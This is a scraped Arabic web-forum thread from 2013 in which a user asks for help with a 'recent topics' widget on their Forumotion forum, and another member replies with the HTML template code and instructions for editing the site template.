<input type="hidden" name="securitytoken" value="guest" />
<input type="hidden" id="dismiss_notice_hidden" name="dismiss_noticeid" value="" />
<input type="hidden" name="url" value="" />
<div class="w1">
<div class="w2"></div>
<div class="w3"></div>


</div>

<div class="body-z">

<div class="z1">
<div class="z2">

<!-- border top -->
<table class="tborder" cellpadding="6" cellspacing="1" border="0" width="100%" align="center">
<tr>
<td class="thead">الملاحظات</td>
</tr>
<tr>
<td class="alt1">
<div class="navbar_notice"><div style="margin: 2px; background-color: #EAF8DA; border: 1px solid #82B840; color: #82B840; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-weight: bold; text-align: right; padding: 6px; float: right;">
<a href="http://www.a7la-7ekaya.com/t6570-topic"> حصريا قوالب [Template] اعلى 10 احصائيات من صنعنا </a>
</div>
<div style="margin: 2px; background-color: #FFF5EC; border: 1px solid #FFAE66; color: #F04C13; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-weight: bold; text-align: right; padding: 6px; float: right;">
<a href="http://www.a7la-7ekaya.com/t6223-topic">تنبيه عام لكل شخص ينزع حقوقنا </a>
</div>
<div style="margin: 2px; background-color: #F3FAFB; border: 1px solid #88CCD6; color: #F85C1F;font-weight: bold; font-family: Arial, Helvetica, sans-serif; font-size: 16px;text-align: right; padding: 6px; float: right;" class="style1">
<a href="http://www.a7la-7ekaya.com/t5620-topic">اسرار ارشفة منتداك فى محركات البحث </a>
</div>
<div style="margin: 2px; background-color: #FFF5EC; border: 1px solid #FFAE66; color: #F04C13; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-weight: bold; text-align: right; padding: 6px; float: right;">
<a href="http://www.a7la-7ekaya.com/f72-montada">انضم الى فريق الاشراف</a>
</div></div>
</td>
</tr>

<tr>
<td class="alt1">
<div class="navbar_notice"><div style="margin: 2px; background-color: #EAF8DA; border: 1px solid #82B840; color: #82B840; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-weight: bold; text-align: right; padding: 6px; float: right;">
<a href="http://www.a7la-7ekaya.com/t7012-topic"> حصريا قوالب [Template] لوحة التحكم(( البيانات الشخصيه )) من صنعنا </a>
</div>
<div style="margin: 2px; background-color: #FFF5EC; border: 1px solid #FFAE66; color: #F04C13; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-weight: bold; text-align: right; padding: 6px; float: right;">
<a href="http://www.a7la-7ekaya.com/t7013-topic"> قوالب استعراض او قراءة الرسائل من صنعنا </a>
</div>
<div style="margin: 2px; background-color: #F3FAFB; border: 1px solid #88CCD6; color: #F85C1F;font-weight: bold; font-family: Arial, Helvetica, sans-serif; font-size: 16px;text-align: right; padding: 6px; float: right;" class="style1">
<a href="http://www.a7la-7ekaya.com/t7011-topic">حصريا قوالب معاينة الرسائل من صنعنا </a>
</div>
<div style="margin: 2px; background-color: #FFF5EC; border: 1px solid #FFAE66; color: #F04C13; font-family: Arial, Helvetica, sans-serif; font-size: 16px; font-weight: bold; text-align: right; padding: 6px; float: right;">
<a href="http://www.a7la-7ekaya.com/t7015-topic">قوالب (( index_box )) المميزه من صنعنا</a>
</div></div>
</td>
</tr>

</table>
</div>
</div>
</div>

<div class="q1">
<div class="q2"></div>
<div class="q3"></div>
</div>


<!-- border buttom -->
<br />
</form><!-- NAVBAR POPUP MENUS -->

<!-- / NAVBAR POPUP MENUS -->
<!-- PAGENAV POPUP -->
<div class="vbmenu_popup" id="pagenav_menu" style="display:none">
<table cellpadding="4" cellspacing="1" border="0">
<tr>
<td class="thead" nowrap="nowrap">الذهاب إلى الصفحة...</td>
</tr>
<tr>
<td class="vbmenu_option" title="nohilite">
<form action="index.php" method="get" onsubmit="return this.gotopage()" id="pagenav_form">
<input type="text" class="bginput" id="pagenav_itxt" style="font-size:11px" size="4" />
<input type="button" class="button" id="pagenav_ibtn" value="إذهب" />
</form>
</td>
</tr>
</table>
</div>
<!-- / PAGENAV POPUP -->


<div style="clear: both;"></div>
<table cellspacing="0" cellpadding="0" border="0" align="{MENU_POSITION}">
<tr>
<td align="{MENU_POSITION}"{MENU_NOWRAP}>{GENERATED_NAV_BAR}</td>
</tr>
</table>
<div style="clear: both;"></div>

<div id="page-body">
<div id="{ID_CONTENT_CONTAINER}"{CLASS_CONTENT_CONTAINER}>
<table cellpadding="0" cellspacing="0" width="100%" class="three-col">
<tbody>
<tr>

<td valign="top" width="100%">
<div id="center">


<!-- بداية اطار علوي -->
<div class="w1">
<div class="w2"></div>
<div class="w3"></div>


</div>

<div class="body-z">

<div class="z1">
<div class="z2">
<!-- / نهاية اطار علوي -->

<table class="tborder" align="center" border="0" cellpadding="6" cellspacing="1" width="100%">
<thead>
<tr valign="top">
<td class="tcat" colspan="4"><a name="cyb_stats" style="float:left" href="#top" onclick="return toggle_collapse('cyb_fh_stats')"><img id="collapseimg_cyb_fh_stats" src="images/buttons/collapse_tcat.gif" alt="" border="0"></a>

<span style="cursor: pointer;" id="cybstatsoptions">أعلى 10 إحصائيات <script language="Javascript" type="text/javascript"> vbmenu_register("cybstatsoptions"); </script> <img alt="" title="" src="images/misc/menu_open.gif" border="0"></span>
<div class="vbmenu_popup" id="cybstatsoptions_menu" style="display:none">
<table border="0" cellpadding="4" cellspacing="1">
<tbody><tr valign="top">
<td class="thead">خيارات</td>
</tr>

<tr valign="top">
<td class="vbmenu_option" title="مشاهدة نتائج أكثر"><a href="http://www.a7la2010.---ممنوع الاشهار---/vp/misc.php?do=cybstats" rel="nofollow">مشاهدة نتائج أكثر</a></td>
</tr>


<tr valign="top">
<td class="vbmenu_option" title="إيقاف الإحصائيات"><a href="http://www.a7la2010.---ممنوع الاشهار---/vp/misc.php?do=disablestats" rel="nofollow">إيقاف الإحصائيات</a></td>
</tr>

</tbody></table>
</div>

</td>
</tr>
</thead>
<tbody id="collapseobj_cyb_fh_stats" style="">
<tr style="height:1%;vertical-align:top">
<td class="alt1" rowspan="2" style="width:1px;height:70px;max-height:70px;display:none;"></td>


<td class="thead" align="right" nowrap="nowrap">افضل الاعضاء هذا الاسبوع</td>


<td class="thead" align="right" nowrap="nowrap">أكثر الاعضاء مشاركه</td>


<td class="thead" align="right" nowrap="nowrap">أفضل 10 اعضاء هذا الشهر</td>


<td class="thead" align="right" nowrap="nowrap">آخر المشاركات</td>

</tr>
<tr style="vertical-align:top;height:70px;max-height:70px;">
<!-- BEGIN giefmod_index1 -->
{giefmod_index1.MODVAR}
<!-- BEGIN saut -->
<div style="height:{SPACE_ROW}px"></div>
<!-- END saut -->
<!-- END giefmod_index1 -->
</tr>

</tbody>
</table>

<!-- بداية اطار سفلي -->
</div>
</div>
</div>

<div class="q1">
<div class="q2"></div>
<div class="q3"></div>
</div>
<!-- / نهاية اطار سفلي -->
<br />

</div>
</td></tr> <tr>
<td valign="top" width="100%">
<!-- BEGIN html_validation -->
</td>
</tr>
</tbody>
</table>
</div>
</div>
</td>
</tr>
</table>
</body>
</html>
<!-- END html_validation -->

<!-- BEGIN switch_user_logged_out -->
<br />

<div class="w1">
<div class="w2"></div>
<div class="w3"></div>


</div>

<div class="body-z">

<div class="z1">
<div class="z2">

<!-- guest welcome message -->
<table class="tborder" cellpadding="6" cellspacing="1" border="0" width="100%" align="center">
<tr>
<td class="tcat">أهلا وسهلا بك إلى {L_INDEX}.</td>
</tr>
<tr>
<td class="alt1">
<b>أهلا وسهلا بك زائرنا الكريم <font color="#008000"> نود ان نلفت انتباهك ان التسجيل مجاني في
{L_INDEX}</font><font size="4" color="#FF0000"> </font></b>
<font size="4"><strong><a href="/register"><font color="#FF0000">لل</font></a></strong></font><a href="/register"><strong><font size="4" color="#FF0000">تسجيل
اضغط هنا</font></strong></a> <font color="#008000"><b>إذا رغبت بالمشاركة في المنتدى والاستفادة من الدورات
التعليمية وجديد المواضيع او لديك اي مشكلة وتريد المساعدة العاجلة مجانا بمجرد
تسجيلك،</b>
avatar
mando123487
 
 

ذكر
عدد المساهمات : 213
معدل النشاط : 2886
السُمعة : 1

http://aboelella.forumegypt.net/

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: طلب عمل كود المواضيع الاخيرة

مُساهمة من طرف mando123487 في الثلاثاء 4 يونيو 2013 - 18:35

هو مفيش رد علطول كده
avatar
mando123487
 
 

ذكر
عدد المساهمات : 213
معدل النشاط : 2886
السُمعة : 1

http://aboelella.forumegypt.net/

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: طلب عمل كود المواضيع الاخيرة

مُساهمة من طرف T w ! x في الأربعاء 5 يونيو 2013 - 1:04

اخى تاابع الشرح كويس

mod_recent_topics

الكود:

[/b][b]    <style>
    div.title {
    font-size: 12px;
    font-weight: bold;
    text-decoration: none;
    color: #fff;
    text-align:center;
    }
    </style>
    <!-- BEGIN classical_row -->
    <table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="3" align="center"><tbody>
    <thead><tr><th colspan="{catrow.tablehead.INC_SPAN}" nowrap="nowrap" width="100%" class="secondarytitle">
    <div class="ist">آخر المواضيع</div>[/b][b]
    </th></tr></thead>
    <tr>
 
  <td style="padding: 0px; background: rgb(255, 255, 255) none
repeat scroll 0% 0%; -moz-background-clip: border;
-moz-background-origin: padding; -moz-background-inline-policy:
continuous;" width="100%">
    <table border="0" cellpadding="0" cellspacing="0" colspan="3" width="100%">

    <tr><td class="catHead" colspan="2" width="50%">
    <div class="title"><font color="black">الموضوع</font></div>
    </td>
    <td class="catHead" colspan="1" width="25%">
    <div class="title"><font color="black">تاريخ ارسال  المشاركة</font></div>
    </td>
    <td class="catHead" colspan="1" width="25%">
    <div class="title"><font color="black">بواسطة</font></div>
    </td></tr>

    <tr valign="top">
 
  <td colspan="1" style="border-top: 0px none; padding: 0px;
background: transparent
url(http://illiweb.com/fa/pbucket.gif)
no-repeat scroll center top; -moz-background-clip: border;
-moz-background-origin: padding; -moz-background-inline-policy:
continuous;" width="24"><img src="http://illiweb.com/fa/empty.gif"
 width="24" border="0"></td><td style="border-top: 0px none;
 padding: 0px; line-height: 20px; background-repeat: repeat;"
align="left"
background="http://illiweb.com/fa/pbucket.gif"
 width="50%">

    <!-- BEGIN recent_topic_row -->
 
 <a
href="{classical_row.recent_topic_row.U_TITLE}"><b><font
style="font-family: Tahoma; font-size:
11px">{classical_row.recent_topic_row.L_TITLE}</font></b></a><br>

    <!-- END recent_topic_row -->
    </td>
 
  <td style="border-top: 0px none; padding: 0px; line-height:
16.5px; background-repeat: repeat;" align="center"
background="http://illiweb.com/fa/pbucket.gif"
 width="25%">
    <span class="gensmall">
    <!-- BEGIN recent_topic_row -->
    <img src="http://vb.vip600.com/images/icons/red-star.gif" width="16px" height="16px" />
    {ON} {classical_row.recent_topic_row.S_POSTTIME}
    <br><!-- END recent_topic_row -->
    </span>
    </td>
 
  <td style="border-top: 0px none; padding: 0px; line-height: 17px;
background-repeat: repeat;" align="left"
background="http://illiweb.com/fa/pbucket.gif"
 width="25%">
    <!-- BEGIN switch_poster -->
    <a
href="{classical_row.recent_topic_row.switch_poster.U_POSTER}">{classical_row.recent_topic_row.switch_poster.S_POSTER}</a>
    <!-- END switch_poster -->
    <!-- BEGIN switch_poster_guest -->
    {classical_row.recent_topic_row.switch_poster_guest.S_POSTER}
    <!-- END switch_poster_guest -->
    <!-- BEGIN recent_topic_row -->
    <img src="http://www.birazkisisel.com/wp-content/plugins/wp-favorite-posts/img/star.png">
 
  <a
href="{classical_row.recent_topic_row.switch_poster.U_POSTER}"><font
 style="font-family: Tahoma; font-size:
11px">{classical_row.recent_topic_row.switch_poster.S_POSTER}</font></a>
    <br><!-- END recent_topic_row -->

    </td>
    </tr></table></td></tr></tbody></table>
    <!-- END classical_row -->[/b][b]

وفي القالب قم بهادا التعديل

ابحث عن هادا الكود

الكود:
[b]<td valign="top" width="{C1SIZE}">
                                        <div id="{ID_LEFT}">
                                            <!-- BEGIN giefmod_index1 -->
                                            {giefmod_index1.MODVAR}
                                                <!-- BEGIN saut -->
                                                <div style="height:{SPACE_ROW}px"></div>
                                                <!-- END saut -->
                                            <!-- END giefmod_index1 -->[/b][b]

وقم ب بوضع هادا الكود مكانه
[/b]
الكود:

[b]<td valign="top" width="100%">
                                  <div id="center">
                                   
                              <br><br>     
                                    <!-- BEGIN giefmod_index1 -->
                                    {giefmod_index1.MODVAR}
                                        <!-- BEGIN saut -->
                                        <div style="height:{SPACE_ROW}px"></div>
                                        <!-- END saut -->
                                    <!-- END giefmod_index1 -->
</div>
                              </td></tr><tr>
[/b]


avatar
T w ! x
 
 

ذكر
عدد المساهمات : 2251
معدل النشاط : 5214
السُمعة : 56

http://f-mzaj.all-up.com/

الرجوع الى أعلى الصفحة اذهب الى الأسفل

رد: طلب عمل كود المواضيع الاخيرة

مُساهمة من طرف mando123487 في الأربعاء 5 يونيو 2013 - 3:23

شكرا حلت المشكلة طلع القالب مترك قى الصندوق اساسا
avatar
mando123487
 
 

ذكر
عدد المساهمات : 213
معدل النشاط : 2886
السُمعة : 1

http://aboelella.forumegypt.net/

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى